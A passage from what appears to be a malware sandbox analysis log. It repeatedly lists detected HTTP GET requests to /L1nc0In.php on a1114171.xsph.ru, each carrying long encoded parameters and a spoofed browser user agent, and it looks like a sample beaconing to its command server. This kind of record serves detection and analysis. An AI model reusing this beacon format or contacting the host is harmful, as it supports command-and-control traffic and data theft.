WdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSyUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSzUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=QX9JiI6ISZxgTM3IGOwUWZwIzNwkzYwgTM2E2MkJzN4gDOiNTNlJCLiQzM5ImMmJWZyYTYyMTOyEGM5QGZkVzN4ETN4YjMmFjY4YWMkdjNjVmI6IiMxEWYjZWZmZ2YjJzMkVTMwcTNkZmM0YTMyIGNkRmZjJCLiYGN2UmM4IWM1czY5czYjFTMmdzMkN2MjRzNwQmZyQGOyAzM2IGO0kjI6ICOjJmNmdDZ3MWZjBjN5EGOjZWZ3MDM1ITZhJmYzEDNxIyes0nI5EjbJpXMHl0MVRVTp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSzUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSzUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: a1114171.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?ez9hdN8pp1=atoFHp7EJxALtCplarj6&qs8041Oe7oRYFP=SNtlz7OeeoQ&ylh7F5MuBqONytkLJ=wnwVTM87GbbOdMoVZ2ZrLd3&0672f02f25522894498045624bdc1619=zU2NlRmYmVmNyYDZjVmY3UmMkVmYzATOmRTZ2ITY3EDM4ITYwMmMmBDMyQTN0QDO1gDN4kzN&a67d1e031b8c1e808a6c381772ce6495=wNlV2YxMmZ0EGNmVDO4AjMwgjNwYTOkJjYxEWO2ADMkdDN5IjY1cTZ&5ee2bccf13ed19bf5f9c534f1169eac4=d1nI0MTOiJjZiVmM2EmMzkjMhBTOkRGZ1cDOxUDO2IjZxIGOmFDZ3YzYlJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W&c0fb3202b93362b1726aed31ca126308=d1nIiojIlFDOxcjY4ATZlBjM3ATOjBDOxYTYzQmM3gDO4I2M1UmIsICNzkjYyYmYlJjNhJzM5ITYwkDZkRWN3gTM1gjNyYWMihjZxQ2N2MWZiojIyETYhNmZlZmZjNmMzQWNxAzN1QmZyQjNxIjY0QGZmNmIsIiZ0YTZygjYxUzNjlzNjNWMxY2NzQ2YzMGN3ADZmJDZ4IDMzYjY4QTOiojI4MmY2Y2NkdzYlNGM2kTY4MmZldzMwUjMlFmYiNTM0EjI7xSfikTMulkexcUSzUFVNl2bqlENnRlTppVbNBTTqllaWdVTzkkMNlXUHplMFJTWrZkaOxmUy4EbS1mWp5UbOxmQ65UbSpWWrpUelZTSTlFMGdkUwgGWal2dT5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarN0TnNWbiBnQINGbSNTVn1EROhXQDJGbSJjYOJUaOd2aIJGcxcVWHJ0QOJzdXpFM1c1UvFUallEZFl0dRpGT5F0QRdWQE1kMZRUSWJUMRdWSUtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SDRWRJh3ZDl0VGRlUEJVMSl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlXY5lzVXZGZYp1T5MVWqxWbjxWMXFVavpWSsVjMiZjVXJGcS5WSzl0QNdXQE10dBpWS2k0QihmUzMmdC5WSzlUejxmUYlFMOZUSrZ1RkBXNXZ1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWR65ENNpGTwcGVMNXVE9EMjpGT61kaJZTS5lld41WSzlUeVZlSp9Uar52YwUzVkZnTtl0cJNVWwRWbjZnVyIVavpWS1lzVh5mVtNWa3lWSoJlbihGeHRmQKl2TptGSkBnTtl0cJNVTyUkaMh3YU1UdjR0T4RzUPRTSp9UaBhVYpNnbPlGOtpVdsV0YKp0QMlWTuJmdadkYopUaPlWVXJGa1s2Ys5EWWl2dplEenpnT4t2aThUM5FVUKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUWM4EzNihDMlVGMycDM5MGM4EjNhNDZycDO4gjYzUTZiwiIlFGM3YTNkBTZyQzMygjMhZ2NlZ2YzAjMlJGZ5YDNldDO0cjZ4MTNjJiOiITMhF2YmVmZmN2YyMDZ1EDM3UDZmJDN2EjMiRDZkZ2YiwiImRjNlJDOiFTN3MWO3M2YxEjZ3MDZjNzY0cDMkZmMkhjMwMjNihDN5IiOigzYiZjZ3Q2NjV2YwYTOhhzYmV2NzATNyUWYiJ2MxQTMis3W HTTP/1.1Accept: /Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 